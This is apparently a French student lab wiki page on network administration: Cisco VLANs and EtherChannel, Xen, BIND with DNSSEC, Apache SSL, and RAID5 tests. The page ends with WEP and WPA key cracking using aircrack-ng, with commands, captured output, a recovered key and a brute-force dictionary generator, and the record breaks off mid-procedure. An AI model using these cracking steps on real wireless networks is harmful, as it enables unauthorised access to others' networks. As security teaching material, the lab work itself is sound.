La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;br /&gt;
&lt;br /&gt;
===Configuration d'une EtherChannel===&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.&lt;br /&gt;
&lt;br /&gt;
Voici la commande à rentrer dans l'interface de configuration du commutateur :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
 6 Switch-E304(config-if)#channel-protocol lacp&lt;br /&gt;
 7 Switch-E304(config-if)#channel-group 1 mode passive&lt;br /&gt;
 8 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 9 Switch-E304(config-if)#end&lt;br /&gt;
 10 Switch-E304#write memory (enregistrer la configuration)  &lt;br /&gt;
&lt;br /&gt;
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS et DNSSEC avec bind===&lt;br /&gt;
&lt;br /&gt;
La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi.&lt;br /&gt;
Il faut alors se diriger sur la rubrique :''Gérer les Glue records''.&lt;br /&gt;
A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :&lt;br /&gt;
&lt;br /&gt;
'''nom du serveur''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''IP''' : 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique ''modifier les serveurs DNS'' :&lt;br /&gt;
&lt;br /&gt;
'''DNS1''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''DNS2''' : ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier ''/etc/bind'' de notre machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
Nous modifions dans un premier temps le fichier ''named.conf.local'' afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;bielloumutherfucker.space&amp;quot; {&lt;br /&gt;
 type master;&lt;br /&gt;
 FIle &amp;quot;/etc/bind/zones/db.bielloumutherfucker.space&amp;quot;;&lt;br /&gt;
 allow-transfer {217.70.177.40; };&lt;br /&gt;
 notify yes;	&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
nous créons ensuite un dossier ''zones'' à l'intérieur duquel nous créons notre fichier de zone ''db.bielloumutherfucker.space'' :&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.bielloumutherfucker.space. root.bielloumutherfucker.space. (&lt;br /&gt;
                    2015102001         ; Serial&lt;br /&gt;
                         86400         ; Refresh&lt;br /&gt;
                          3600         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                         86400 )       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
 @       IN      NS      ns.bielloumutherfucker.space.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.167&lt;br /&gt;
 www     IN      A       193.48.57.167&lt;br /&gt;
 @	IN	A	193.48.57.167&lt;br /&gt;
&lt;br /&gt;
Il nous faut ensuite modifier notre fichier ''/etc/resolv.conf'' afin de passer par notre serveur :&lt;br /&gt;
&lt;br /&gt;
 search bielloumutherfucker.space&lt;br /&gt;
 nameserver 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, notre serveur DNS est opérationnel. Il nous faut maintenant le sécuriser grâce à DNSSEC.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il nous faut générer les clefs asymétriques KSK et ZSK. Nous entrons alors les commandes suivantes dans le terminal :&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -f KSK -b 2048 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef KSK&lt;br /&gt;
 dnssec-keygen -a RSASHA1 --b 1024 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef ZSK&lt;br /&gt;
&lt;br /&gt;
Nous avons maintenant 4 clefs : deux pour chaque type de clef (KSK ou ZSK) avec deux extention différentes (.key pour la clef publique, .private pour la privée).&lt;br /&gt;
&lt;br /&gt;
Après les avoir placé dans le répertoire ''bielloumutherfucker.space.dnssec'' que nous avons crée, on les renomme selon le schéma suivant :&lt;br /&gt;
&lt;br /&gt;
 bielloumutherfucker.space-ksk.key et bielloumutherfucker.space-ksk.private&lt;br /&gt;
 bielloumutherfucker.space-zsk.key et bielloumutherfucker.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant signer la zone à l'aide de la commande suivante (depuis le dossier /etc/bind) :&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o bielloumutherfucker.space -k bielloumutherfucker.space-ksk &lt;br /&gt;
 zones/db.bielloumutherfucker.space bielloumutherfucker.space-zsk&lt;br /&gt;
&lt;br /&gt;
Une nouvelle zone, signée, a donc été créée dans notre dossier ''zones''. Il ne nous reste plus qu'à modifier le fichier ''named.conf.local'' en rajoutant un ''.signed'' à la fin du champ File pour notre zone. Nous redémarrons ensuite le serveur bind.&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Nous retournons sur le site de gandi et dans la rubrique ''gérer DNSSEC'' nous ajoutons notre clef publique avec l'algorithme ''RSASHA1''. Une fois la clef ajoutée sur gandi, on peut voir que tous s'est bien passé en faisant un tour sur le site ''Zone Master'', l'attribut DNSSEC est en effet coché et vert.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du site via certificat SSL===&lt;br /&gt;
&lt;br /&gt;
Il faut dans un premier temps générer la clefs CSR que nous donnerons à Gandi.&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout Ironman.key -out Ironman.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 ..................................................................+++&lt;br /&gt;
 .........................................+++&lt;br /&gt;
 writing new private key to 'Ironman.key'&lt;br /&gt;
 -----&lt;br /&gt;
 You are about to be asked to enter information that will be incorporated&lt;br /&gt;
 into your certificate request.&lt;br /&gt;
 What you are about to enter is what is called a Distinguished Name or a DN.&lt;br /&gt;
 There are quite a few fields but you can leave some blank&lt;br /&gt;
 For some fields there will be a default value,&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord &lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:bielloumutherfucker.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 Please enter the following 'extra' attributes&lt;br /&gt;
 to be sent with your certificate request&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, ls clefs ont été générées : &lt;br /&gt;
 &lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
 Ironman.csr  Ironman.key&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Et nous pouvons donner la CSR à Gandhi afin d'activer la procédure d'activation.&lt;br /&gt;
&lt;br /&gt;
De façon à recevoir le mail sur admin@bielloumutherfucker.space, nous devons modifier le fichier /etc/aliases et y rajouter la ligne suivante:&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 admin: root&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat validé, il faut déplacer les clefs dans les dossiers suivants :&lt;br /&gt;
&lt;br /&gt;
 cp Ironman.key /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
 cp certificate-380187.crt /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
 cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem (clef intermédiaire)&lt;br /&gt;
&lt;br /&gt;
On effectue ensuite un rehash des certificats :&lt;br /&gt;
&lt;br /&gt;
 c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 6860aa7d.0&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 5692355e.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; a036afff.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; 4390636f.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; 8544bf03.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; e279a80b.0&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le fichier ''000-bielloumutherfucker.space-ssl.conf'' dans le dossier /etc/apache2/sites-available :&lt;br /&gt;
&lt;br /&gt;
 #NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.167:443&amp;gt;&lt;br /&gt;
                ServerName www.bielloumutherfucker.space&lt;br /&gt;
                ServerAlias bielloumutherfucker.space&lt;br /&gt;
                DocumentRoot /var/www/html/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/html&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
 ServerName &amp;quot;bielloumutherfucker.space&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Puis on modifie le fichier /etc/apache/ports.conf afin qu'apache écoute sur le port 443 (ssl) :&lt;br /&gt;
&lt;br /&gt;
 Listen 80 443&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On doit ensuite autoriser apache à utiliser son module ssl : &lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Puis on autorise notre site à utiliser ssl :&lt;br /&gt;
&lt;br /&gt;
 a2ensite 000-bielloumutherfucker.space-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Ensuite :&lt;br /&gt;
&lt;br /&gt;
 service apache2 restart&lt;br /&gt;
 service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Maintenant, lorsqu'on se connecte sur notre site avec le préfixe &amp;quot;https://&amp;quot;, le site s'ouvre bien, et on aperçoit un cadenas vert certifiant que le site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ssl.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation des données===&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : Ironman:0  (local to host Ironman)&lt;br /&gt;
           UUID : a82c02d3:4861fdcc:aa9f6f91:45e6f5d9&lt;br /&gt;
         Events : 0&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
fichier de test sur le raid 5 (iron-man.txt):&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:/datamd0# ls&lt;br /&gt;
 lost+found  test_ironman.txt&lt;br /&gt;
&lt;br /&gt;
première partion removed :&lt;br /&gt;
&lt;br /&gt;
root@Ironman:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Thu Dec  8 17:05:13 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : Ironman:0  (local to host Ironman)&lt;br /&gt;
           UUID : a82c02d3:4861fdcc:aa9f6f91:45e6f5d9&lt;br /&gt;
         Events : 6&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
fichier toujours présent :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# ls /datamd0/&lt;br /&gt;
 lost+found  test_ironman.txt&lt;br /&gt;
&lt;br /&gt;
On enlève la partition xvdf :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
 [  196.176623] md/raid:md0: Disk failure on xvdf, disabling device.&lt;br /&gt;
 [  196.176623] md/raid:md0: Operation continuing on 1 devices.&lt;br /&gt;
 mdadm: set /dev/xvdf faulty in /dev/md0&lt;br /&gt;
 root@Ironman:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
 [  229.573919] md: unbind&amp;lt;xvdf&amp;gt;&lt;br /&gt;
 [  229.573933] md: export_rdev(xvdf)&lt;br /&gt;
 mdadm: hot removed /dev/xvdf from /dev/md0&lt;br /&gt;
&lt;br /&gt;
===Crackage de clé WEP===&lt;br /&gt;
&lt;br /&gt;
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP.&lt;br /&gt;
Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                                &lt;br /&gt;
 04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            &lt;br /&gt;
                                                                                                                                      &lt;br /&gt;
 04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   &lt;br /&gt;
 (not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   &lt;br /&gt;
 (not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   &lt;br /&gt;
 44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2&lt;br /&gt;
&lt;br /&gt;
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :&lt;br /&gt;
 airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 &lt;br /&gt;
&lt;br /&gt;
Une fois le fichier de capture créé, nous avons exécuter la commande &lt;br /&gt;
&lt;br /&gt;
 aircrack cracotte06-01.cap&lt;br /&gt;
&lt;br /&gt;
afin débuter le crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant en quelques minutes :&lt;br /&gt;
&lt;br /&gt;
                 [00:01:53] Tested 279622 keys (got 31535 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) &lt;br /&gt;
    1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) &lt;br /&gt;
    2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) &lt;br /&gt;
    3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) &lt;br /&gt;
    4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) &lt;br /&gt;
    5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) &lt;br /&gt;
    6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) &lt;br /&gt;
    7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) &lt;br /&gt;
    8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) &lt;br /&gt;
    9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) &lt;br /&gt;
   10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) &lt;br /&gt;
   11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) &lt;br /&gt;
   12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
La clé a été trouver et sa valeur est &amp;quot;EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44&amp;quot;&lt;br /&gt;
&lt;br /&gt;
===Craquage de clé WPA===&lt;br /&gt;
&lt;br /&gt;
Le craquage d'une clé WPA est beaucoup plus long que celui d'une clé WEP car le crack doit effectuer un test sur tout les nombres à 8 chiffres jusqu'à arriver au mot de passe de la borne Wifi. C'est un crack en force brute.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc tout d'abord génerer un fichier texte contenant tout les nombres à 8 chiffres (de 00000000 à 99999999) grâce au petit programme c suivant :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define MAX_NUM 99999999&lt;br /&gt;
&lt;br /&gt;
 int main(){&lt;br /&gt;
 long chiffre = 0;&lt;br /&gt;
 FILE* fp = NULL;&lt;br /&gt;
 fp = fopen(&amp;quot;dictionnaire.txt&amp;quot;,&amp;quot;a+&amp;quot;);&lt;br /&gt;
 	if (fp != NULL){&lt;br /&gt;
 		for (chiffre=0;chiffre&amp;lt; MAX_NUM + 1;chiffre++)&lt;br /&gt;
 		{&lt;br /&gt;
 		fprintf(fp,&amp;quot;%08li\n&amp;quot;,chiffre);&lt;br /&gt;
 		}&lt;br /&gt;
 	fclose(fp);&lt;br /&gt;
 	}&lt;br /&gt;
 return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Une fois le dictionnaire généré, on effectue la même commande qu'avec le crackage WEP mais pour les clés WPA : &lt;br /&gt;
&lt;br /&gt;
1. On bascule l'interface wifi en mode monitor :&lt;br /&gt;
 airmon-ng start wlan2&lt;br /&gt;
&lt;br /&gt;
2. On fait un airodump-ng de tout les réseaux possédant un chiffrage WPA :&lt;br /&gt;
 airodump-ng --encrypt WPA wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 00:19:07:C5:0F:A4  -44        7        8    2   1  54e. WPA2 CCMP   MGT  PolytechLille                                              &lt;br /&gt;
 00:19:07:C5:0F:A2  -48        5        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A5  -48        6        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A3  -50        7        0    0   1  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 00:19:07:C5:0F:A1  -50        7        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A7  -52        6        0    0   1  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 00:19:07:C5:0F:A6  -52        5        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A0  -54        6        2    0   1  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 00:19:07:C5:0F:A8  -55        5        5    0   1  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:9C:50:53  -62        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte04                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte03                                                 &lt;br /&gt;
 04:DA:D2:9C:50:58  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte09                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -66        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte01                                                 &lt;br /&gt;
 04:DA:D2:9C:50:55  -65        6        0    0  13  54e. WPA2 CCMP   PSK  cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -65        3        0    0  13  54e. WPA2 CCMP   PSK  cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:59  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte10                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:57  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:51  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte02                                                 &lt;br /&gt;
 04:DA:D2:CF:01:91  -69        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 C8:00:84:84:00:53  -70        3        0    0   9  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 C8:00:84:84:00:52  -71        4        0    0   9  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:98  -70        2        0    0   5  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:CF:01:90  -71        3        0    0   5  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 04:DA:D2:CF:01:95  -72        2        0    0   5  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:97  -72        2        0    0   5  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 04:DA:D2:CF:01:96  -72        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. Nous décidons de cracker cracotte09, on lance un airodump sur son essid et on effectue une capture &lt;br /&gt;
 &lt;br /&gt;
 airodump-ng -w cracotte09 --encrypt wpa -c 13 -essid cracotte09 wlan05&lt;br /&gt;
&lt;br /&gt;
4. On lance le aircrack avec le fichier de capture et notre dictionnaire généré précédemment :&lt;br /&gt;
